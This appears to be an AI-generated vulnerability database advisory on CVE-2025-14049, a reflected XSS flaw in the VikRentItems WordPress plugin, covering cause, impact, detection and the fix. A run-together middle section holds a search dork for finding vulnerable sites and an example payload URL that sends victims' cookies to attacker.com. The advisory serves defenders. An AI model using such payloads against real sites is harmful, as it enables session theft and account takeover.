
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-14049 is a Reflected Cross-Site Scripting (XSS) vulnerability in the VikRentItems Flexible Rental Management System plugin for WordPress. It affects all versions up to and including 1.2.0, stemming from insufficient input sanitization and output escaping of the delto parameter. The vulnerability was published on December 12, 2025, and assigned by Wordfence. It carries a CVSS v3.1 base score of 6.1 (Medium) (Wordfence, Red Hat CVE).
The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-site Scripting). The vulnerable code resides in the deliverymap view template (site/views/deliverymap/tmpl/default.php, line 277), where the delto parameter is reflected into the page output without proper sanitization or escaping. An unauthenticated attacker can craft a malicious URL containing a JavaScript payload in the delto parameter and trick a victim into clicking it, causing the script to execute in the victim's browser context (Wordfence, WordPress Trac).
Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of a victim user's browser session on the affected WordPress site. This can lead to session cookie theft, credential harvesting, redirection to malicious sites, or defacement of page content as seen by the victim. Because the attack requires user interaction (clicking a crafted link), the scope is changed but availability is not directly impacted (Wordfence, Red Hat CVE).
No public exploit code or active in-the-wild exploitation has been reported for CVE-2025-14049. The EPSS score is approximately 0.087%, indicating a low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires social engineering to trick a user into clicking a crafted link, which raises the practical bar for mass exploitation (Wordfence).
inurl:/wp-content/plugins/vikrentitems).delto parameter, typically accessible via a URL such as https://target.com/?option=com_vikrentitems&view=deliverymap&delto=<payload>.delto parameter, e.g., https://target.com/?option=com_vikrentitems&view=deliverymap&delto=<script>document.location='https://attacker.com/steal?c='+document.cookie</script>.delto parameter with encoded JavaScript (e.g., <script>, %3Cscript%3E, javascript:) in the query string; outbound connections from victim browsers to unknown external domains shortly after page load.delto parameter (e.g., view=deliverymap&delto=%3Cscript%3E).The fix was introduced in the plugin's repository via changeset 3414595, which adds proper input sanitization and output escaping for the delto parameter (WordPress Trac Changeset). Site administrators should update the VikRentItems plugin to the version incorporating this fix immediately. As a temporary workaround, consider disabling the delivery map feature or restricting access to the affected page until the update can be applied. Additionally, deploying a Web Application Firewall (WAF) rule to block requests with script-like content in the delto parameter can reduce exposure.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."